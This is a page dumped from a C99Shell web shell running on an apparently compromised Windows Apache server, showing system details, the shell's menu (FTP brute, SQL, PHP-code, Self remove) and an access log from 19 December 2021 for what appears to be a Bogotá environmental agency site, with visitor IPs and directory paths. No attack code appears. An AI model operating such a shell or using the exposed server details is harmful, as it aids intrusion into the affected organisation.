!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2021.12.19.log (1.47 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [19/Dec/2021:00:00:18 -0500] "HEAD / HTTP/1.1" 200 -
34.147.42.248 - - [19/Dec/2021:00:03:25 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [19/Dec/2021:00:04:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
216.245.221.92 - - [19/Dec/2021:00:05:19 -0500] "HEAD / HTTP/1.1" 200 -
186.169.144.22 - - [19/Dec/2021:00:05:39 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
40.77.167.55 - - [19/Dec/2021:00:06:41 -0500] "GET /php/CarreraAdministrativa/INSTRUCTIVO_SISTEMA_PROPIO_SDA_2010.doc HTTP/1.1" 404 1018
183.136.225.56 - - [19/Dec/2021:00:09:51 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [19/Dec/2021:00:10:18 -0500] "HEAD / HTTP/1.1" 200 -
192.99.62.32 - - [19/Dec/2021:00:14:04 -0500] "GET /auambari-deleito-con-sus-sonidos-ambientales-a-los-asistentes-de-fima-2021.html HTTP/1.1" 200 888
201.245.192.253 - - [19/Dec/2021:00:14:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109723
216.245.221.92 - - [19/Dec/2021:00:15:18 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [19/Dec/2021:00:20:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Dec/2021:00:22:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45156
201.245.192.253 - - [19/Dec/2021:00:23:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43140
201.245.192.253 - - [19/Dec/2021:00:24:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109723
216.245.221.92 - - [19/Dec/2021:00:25:18 -0500] "HEAD / HTTP/1.1" 200 -
186.80.248.168 - - [19/Dec/2021:00:28:51 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
173.252.127.30 - - [19/Dec/2021:00:29:57 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html?fbclid=IwAR3QF9Pe9asSvg2Pm3kCXx9Z2Nj3OtdFnhFXkaB-9_KhfyN9hN_OjVKQTp0 HTTP/1.1" 200 1114
216.245.221.92 - - [19/Dec/2021:00:30:18 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.181 - - [19/Dec/2021:00:30:33 -0500] "GET /images/feria-movil-sda-19-noviembre.jpg HTTP/1.1" 200 47278
199.16.157.180 - - [19/Dec/2021:00:30:33 -0500] "GET /images/nueva-jornada-reciclaton-ambiente-cajas-12-noviembre.jpg HTTP/1.1" 200 479427
199.16.157.182 - - [19/Dec/2021:00:30:34 -0500] "GET /mas-de-36-000-kilogramos-de-residuos-especiales-y-peligrosos-fueron-recolectados-esta-semana-en-bogota.html HTTP/1.1" 200 983
199.16.157.181 - - [19/Dec/2021:00:30:34 -0500] "GET /images/pieza-tramites-servicios-ventanilla-virtual.jpg HTTP/1.1" 200 39260
199.16.157.183 - - [19/Dec/2021:00:30:35 -0500] "GET /mas-de-34-000-tramites-y-servicios-ambientales-se-han-atendido-por-la-ventanilla-virtual.html HTTP/1.1" 200 875
199.16.157.183 - - [19/Dec/2021:00:30:35 -0500] "GET /images/operativo-fuentes-fijas-14-octubre.jpg HTTP/1.1" 200 58397
199.59.150.182 - - [19/Dec/2021:00:30:36 -0500] "GET /consumo-de-energia-en-entidades-del-distrito-tiene-una-tendencia-a-la-baja-en-los-ultimos-anos.html HTTP/1.1" 200 875
199.16.157.183 - - [19/Dec/2021:00:30:36 -0500] "GET /images/conversatotio-carbono-comtaminacion-5-octubre.jpg HTTP/1.1" 200 225350
199.16.157.180 - - [19/Dec/2021:00:30:36 -0500] "GET /images/pieza-global-day-5-octubre.jpg HTTP/1.1" 200 242505
199.16.157.182 - - [19/Dec/2021:00:30:36 -0500] "GET /participa-con-nosotros-en-el-october-big-day.html HTTP/1.1" 200 1039
199.59.150.181 - - [19/Dec/2021:00:30:37 -0500] "GET /images/fachada-secretaria-ambiente-15-octubre.jpg HTTP/1.1" 200 148853
201.245.192.253 - - [19/Dec/2021:00:32:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45156
201.245.192.253 - - [19/Dec/2021:00:33:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43140
201.245.192.253 - - [19/Dec/2021:00:34:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109723
216.245.221.92 - - [19/Dec/2021:00:35:18 -0500] "HEAD / HTTP/1.1" 200 -
35.202.2.1 - - [19/Dec/2021:00:36:46 -0500] "-" 408 -
207.46.13.126 - - [19/Dec/2021:00:39:17 -0500] "GET /portaldeninos/2021/07/01/en-fotos-conoce-algunos-de-los-lugares-mas-biodiversos-de-bogota/feed/ HTTP/1.1" 200 998
216.245.221.92 - - [19/Dec/2021:00:40:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Dec/2021:00:42:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45156
201.245.192.253 - - [19/Dec/2021:00:43:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43140
201.245.192.253 - - [19/Dec/2021:00:44:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109723
216.245.221.92 - - [19/Dec/2021:00:45:18 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.10 - - [19/Dec/2021:00:47:12 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 206 1114
64.233.172.61 - - [19/Dec/2021:00:48:06 -0500] "GET / HTTP/1.1" 200 319
64.233.172.61 - - [19/Dec/2021:00:48:07 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.66.143 - - [19/Dec/2021:00:48:15 -0500] "-" 408 -
186.102.48.73 - - [19/Dec/2021:00:48:38 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
157.55.39.33 - - [19/Dec/2021:00:48:49 -0500] "GET / HTTP/1.1" 200 319
186.30.37.149 - - [19/Dec/2021:00:49:34 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html?fbclid=IwAR27_44F2NXAvKnEGkl4YiEYRr0Bo5pvoN4Hyckw5nyW-N7gvsytfcqZ2dM HTTP/1.1" 200 1114
216.245.221.92 - - [19/Dec/2021:00:50:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Dec/2021:00:54:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109723
186.84.22.234 - - [19/Dec/2021:00:54:49 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
216.245.221.92 - - [19/Dec/2021:00:55:18 -0500] "HEAD / HTTP/1.1" 200 -
181.61.77.31 - - [19/Dec/2021:00:57:38 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [19/Dec/2021:01:00:18 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.71 - - [19/Dec/2021:01:04:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=ts4jnmugquo5n+lon+jtldkz.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
35.204.143.58 - - [19/Dec/2021:01:04:26 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [19/Dec/2021:01:04:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
216.245.221.92 - - [19/Dec/2021:01:05:18 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.52 - - [19/Dec/2021:01:05:46 -0500] "GET /bla/resoluciones/resoluciones%202021/3723.pdf HTTP/1.1" 200 570353
66.249.66.205 - - [19/Dec/2021:01:09:47 -0500] "-" 408 -
152.61.192.232 - - [19/Dec/2021:01:09:49 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [19/Dec/2021:01:10:18 -0500] "HEAD / HTTP/1.1" 200 -
152.61.128.50 - - [19/Dec/2021:01:13:20 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [19/Dec/2021:01:14:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 110134
216.245.221.92 - - [19/Dec/2021:01:15:18 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.113 - - [19/Dec/2021:01:15:35 -0500] "GET /BLA/boletinlegal/disciplinarios.php? HTTP/1.1" 200 2069
207.46.13.113 - - [19/Dec/2021:01:18:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=vdleuzpz6r3yj-wt-gfvv4xb.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
157.55.39.106 - - [19/Dec/2021:01:18:56 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/05068.doc HTTP/1.1" 200 290250
2.187.1.74 - - [19/Dec/2021:01:20:06 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [19/Dec/2021:01:20:18 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.55 - - [19/Dec/2021:01:21:29 -0500] "GET /bla/resoluciones/resoluciones%202021/3920.pdf HTTP/1.1" 200 693914
191.156.56.38 - - [19/Dec/2021:01:21:54 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
201.245.192.253 - - [19/Dec/2021:01:22:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44971
201.245.192.253 - - [19/Dec/2021:01:23:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43308
201.245.192.253 - - [19/Dec/2021:01:24:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 110134
173.252.107.2 - - [19/Dec/2021:01:24:59 -0500] "GET /images/Mision1.jpeg HTTP/1.1" 200 129758
69.171.249.113 - - [19/Dec/2021:01:25:03 -0500] "GET /images/paneles-solares-22septiembre.jpeg HTTP/1.1" 200 66691
31.13.127.28 - - [19/Dec/2021:01:25:07 -0500] "GET /images/oso-peresozo-25-nov.jpg HTTP/1.1" 200 301880
216.245.221.92 - - [19/Dec/2021:01:25:18 -0500] "HEAD / HTTP/1.1" 200 -
186.81.238.92 - - [19/Dec/2021:01:26:48 -0500] "GET /el-dorado-y-secretaria-de-ambiente-se-unen-para-contrarrestar-el-trafico-de-especies-silvestres-en-bogota.html HTTP/1.1" 200 1289
216.245.221.92 - - [19/Dec/2021:01:30:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Dec/2021:01:32:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44971
201.245.192.253 - - [19/Dec/2021:01:33:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43308
201.245.192.253 - - [19/Dec/2021:01:34:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 110134
216.245.221.92 - - [19/Dec/2021:01:35:18 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.106 - - [19/Dec/2021:01:36:26 -0500] "GET /galeria/galeria/fotos/2.jpg HTTP/1.1" 200 204834
173.231.60.194 - - [19/Dec/2021:01:38:28 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS%202013%2F HTTP/1.1" 200 2053
173.231.60.194 - - [19/Dec/2021:01:38:42 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS%202014%2F HTTP/1.1" 200 15754
173.231.60.194 - - [19/Dec/2021:01:38:49 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS%202015%2F HTTP/1.1" 200 19557
173.231.60.194 - - [19/Dec/2021:01:39:02 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS%202016%2F HTTP/1.1" 200 11298
173.231.60.194 - - [19/Dec/2021:01:39:12 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS%202017%2F HTTP/1.1" 200 8259
173.231.60.194 - - [19/Dec/2021:01:39:18 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS%202018%2F HTTP/1.1" 200 10458
173.231.60.194 - - [19/Dec/2021:01:39:27 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS%202019%2F HTTP/1.1" 200 4070
173.231.60.194 - - [19/Dec/2021:01:39:36 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS%202020%2F HTTP/1.1" 200 7707
173.231.60.194 - - [19/Dec/2021:01:39:44 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS%202021%2F HTTP/1.1" 200 9366
173.231.60.194 - - [19/Dec/2021:01:39:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%201997%2F&sort=date&order=asc HTTP/1.1" 200 2025
173.231.60.194 - - [19/Dec/2021:01:40:01 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%201997%2F&sort=size&order=asc HTTP/1.1" 200 2025
173.231.60.194 - - [19/Dec/2021:01:40:08 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202002%2F&sort=date&order=asc HTTP/1.1" 200 1813
173.231.60.194 - - [19/Dec/2021:01:40:14 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202002%2F&sort=size&order=asc HTTP/1.1" 200 1813
216.245.221.92 - - [19/Dec/2021:01:40:18 -0500] "HEAD / HTTP/1.1" 200 -
173.231.60.194 - - [19/Dec/2021:01:40:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202004%2F&sort=date&order=asc HTTP/1.1" 200 2786
173.231.60.194 - - [19/Dec/2021:01:40:33 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202004%2F&sort=size&order=asc HTTP/1.1" 200 2786
173.231.60.194 - - [19/Dec/2021:01:40:39 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202005%2F&sort=date&order=asc HTTP/1.1" 200 2791
173.231.60.194 - - [19/Dec/2021:01:40:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202005%2F&sort=size&order=asc HTTP/1.1" 200 2791
173.252.107.4 - - [19/Dec/2021:01:40:51 -0500] "GET /images/Senderos1.jpeg HTTP/1.1" 200 172777
173.231.60.194 - - [19/Dec/2021:01:40:56 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2F&sort=date&order=asc HTTP/1.1" 200 9681
173.231.60.194 - - [19/Dec/2021:01:41:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2F&sort=size&order=asc HTTP/1.1" 200 9681
173.231.60.194 - - [19/Dec/2021:01:41:13 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%20901-1000%2F HTTP/1.1" 200 21877
173.231.60.194 - - [19/Dec/2021:01:41:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202007%2F&sort=date&order=asc HTTP/1.1" 200 628423
173.231.60.194 - - [19/Dec/2021:01:41:36 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202007%2F&sort=size&order=asc HTTP/1.1" 200 628423
173.231.60.194 - - [19/Dec/2021:01:41:45 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202008%2F&sort=date&order=asc HTTP/1.1" 200 569644
173.231.60.194 - - [19/Dec/2021:01:41:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202008%2F&sort=size&order=asc HTTP/1.1" 200 569644
173.231.60.194 - - [19/Dec/2021:01:42:05 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202009%2F&sort=date&order=asc HTTP/1.1" 200 399207
173.231.60.194 - - [19/Dec/2021:01:42:15 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202009%2F&sort=size&order=asc HTTP/1.1" 200 399207
173.231.60.194 - - [19/Dec/2021:01:42:22 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202010%2F&sort=date&order=asc HTTP/1.1" 200 271559
173.231.60.194 - - [19/Dec/2021:01:42:31 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202010%2F&sort=size&order=asc HTTP/1.1" 200 271559
173.231.60.194 - - [19/Dec/2021:01:42:44 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202011%2F&sort=date&order=asc HTTP/1.1" 200 623541
173.231.60.194 - - [19/Dec/2021:01:42:53 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202011%2F&sort=size&order=asc HTTP/1.1" 200 623541
173.231.60.194 - - [19/Dec/2021:01:43:03 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202012%2F&sort=date&order=asc HTTP/1.1" 200 270447
173.231.60.194 - - [19/Dec/2021:01:43:11 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202012%2F&sort=size&order=asc HTTP/1.1" 200 270447
173.231.60.194 - - [19/Dec/2021:01:43:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202013%2F&sort=date&order=asc HTTP/1.1" 200 405309
201.245.192.253 - - [19/Dec/2021:01:42:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44971
173.231.60.194 - - [19/Dec/2021:01:43:30 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202013%2F&sort=size&order=asc HTTP/1.1" 200 405309
207.46.13.126 - - [19/Dec/2021:01:43:34 -0500] "GET /portaldeninos/humedal-el-tunjo/ HTTP/1.1" 200 80677
173.231.60.194 - - [19/Dec/2021:01:43:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202014%2F&sort=date&order=asc HTTP/1.1" 200 872433
157.55.39.186 - - [19/Dec/2021:01:43:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
157.55.39.186 - - [19/Dec/2021:01:43:52 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
207.46.13.52 - - [19/Dec/2021:01:43:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
157.55.39.33 - - [19/Dec/2021:01:43:52 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
207.46.13.108 - - [19/Dec/2021:01:43:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
173.231.60.194 - - [19/Dec/2021:01:43:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202014%2F&sort=size&order=asc HTTP/1.1" 200 872433
157.55.39.33 - - [19/Dec/2021:01:43:55 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
207.46.13.108 - - [19/Dec/2021:01:43:55 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
157.55.39.186 - - [19/Dec/2021:01:43:55 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
207.46.13.52 - - [19/Dec/2021:01:43:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
207.46.13.108 - - [19/Dec/2021:01:43:58 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
157.55.39.33 - - [19/Dec/2021:01:43:58 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
207.46.13.52 - - [19/Dec/2021:01:43:58 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
157.55.39.186 - - [19/Dec/2021:01:43:58 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
157.55.39.33 - - [19/Dec/2021:01:44:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
207.46.13.126 - - [19/Dec/2021:01:44:01 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
207.46.13.52 - - [19/Dec/2021:01:44:01 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
173.231.60.194 - - [19/Dec/2021:01:44:01 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202015%2F&sort=date&order=asc HTTP/1.1" 200 575855
207.46.13.218 - - [19/Dec/2021:01:44:03 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
207.46.13.126 - - [19/Dec/2021:01:44:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
157.55.39.33 - - [19/Dec/2021:01:44:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
207.46.13.218 - - [19/Dec/2021:01:44:06 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
157.55.39.33 - - [19/Dec/2021:01:44:07 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
207.46.13.126 - - [19/Dec/2021:01:44:07 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
207.46.13.218 - - [19/Dec/2021:01:44:09 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
207.46.13.126 - - [19/Dec/2021:01:44:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
173.231.60.194 - - [19/Dec/2021:01:44:10 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202015%2F&sort=size&order=asc HTTP/1.1" 200 575855
207.46.13.218 - - [19/Dec/2021:01:44:12 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
207.46.13.126 - - [19/Dec/2021:01:44:13 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
201.245.192.253 - - [19/Dec/2021:01:43:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43308
207.46.13.126 - - [19/Dec/2021:01:44:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
173.231.60.194 - - [19/Dec/2021:01:44:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202016%2F&sort=date&order=asc HTTP/1.1" 200 324287
173.231.60.194 - - [19/Dec/2021:01:44:28 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202016%2F&sort=size&order=asc HTTP/1.1" 200 324287
173.231.60.194 - - [19/Dec/2021:01:44:39 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202017%2F&sort=date&order=asc HTTP/1.1" 200 454782
201.245.192.253 - - [19/Dec/2021:01:44:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 110134
173.231.60.194 - - [19/Dec/2021:01:44:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202017%2F&sort=size&order=asc HTTP/1.1" 200 454782
173.231.60.194 - - [19/Dec/2021:01:45:02 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202018%2F&sort=date&order=asc HTTP/1.1" 200 421601
173.231.60.194 - - [19/Dec/2021:01:45:13 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202018%2F&sort=size&order=asc HTTP/1.1" 200 421601
216.245.221.92 - - [19/Dec/2021:01:45:18 -0500] "HEAD / HTTP/1.1" 200 -
173.231.60.194 - - [19/Dec/2021:01:45:23 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202019%2F&sort=date&order=asc HTTP/1.1" 200 330427
173.231.60.194 - - [19/Dec/2021:01:45:31 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202019%2F&sort=size&order=asc HTTP/1.1" 200 330427
173.231.60.194 - - [19/Dec/2021:01:45:40 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202020%2F&sort=date&order=asc HTTP/1.1" 200 314917
173.231.60.194 - - [19/Dec/2021:01:45:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202020%2F&sort=size&order=asc HTTP/1.1" 200 314917
173.231.60.194 - - [19/Dec/2021:01:45:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202021%2F&sort=date&order=asc HTTP/1.1" 200 229754
173.231.60.194 - - [19/Dec/2021:01:46:16 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202021%2F&sort=size&order=asc HTTP/1.1" 200 229754
173.231.60.194 - - [19/Dec/2021:01:46:23 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%201997%2F&sort=name&order=desc HTTP/1.1" 200 2024
173.231.60.194 - - [19/Dec/2021:01:46:30 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202002%2F&sort=name&order=desc HTTP/1.1" 200 1812
40.77.139.53 - - [19/Dec/2021:01:46:35 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
40.77.191.234 - - [19/Dec/2021:01:46:35 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
40.77.139.31 - - [19/Dec/2021:01:46:35 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
173.231.60.194 - - [19/Dec/2021:01:46:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202004%2F&sort=name&order=desc HTTP/1.1" 200 2785
173.231.60.194 - - [19/Dec/2021:01:46:47 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202005%2F&sort=name&order=desc HTTP/1.1" 200 2790
173.231.60.194 - - [19/Dec/2021:01:46:53 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2F&sort=name&order=desc HTTP/1.1" 200 9680
173.231.60.194 - - [19/Dec/2021:01:46:59 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201001-1100%2F HTTP/1.1" 200 21966
173.231.60.194 - - [19/Dec/2021:01:47:07 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201101-1200%2F HTTP/1.1" 200 21976
173.231.60.194 - - [19/Dec/2021:01:47:15 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201201-1300%2F HTTP/1.1" 200 22013
173.231.60.194 - - [19/Dec/2021:01:47:23 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201301-1400%2F HTTP/1.1" 200 22002
173.231.60.194 - - [19/Dec/2021:01:47:32 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202007%2F&sort=name&order=desc HTTP/1.1" 200 628422
173.231.60.194 - - [19/Dec/2021:01:47:45 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202008%2F&sort=name&order=desc HTTP/1.1" 200 569643
173.231.60.194 - - [19/Dec/2021:01:47:53 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202009%2F&sort=name&order=desc HTTP/1.1" 200 399206
173.231.60.194 - - [19/Dec/2021:01:48:12 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202010%2F&sort=name&order=desc HTTP/1.1" 200 271558
173.231.60.194 - - [19/Dec/2021:01:48:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202011%2F&sort=name&order=desc HTTP/1.1" 200 623540
173.231.60.194 - - [19/Dec/2021:01:48:29 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202012%2F&sort=name&order=desc HTTP/1.1" 200 270446
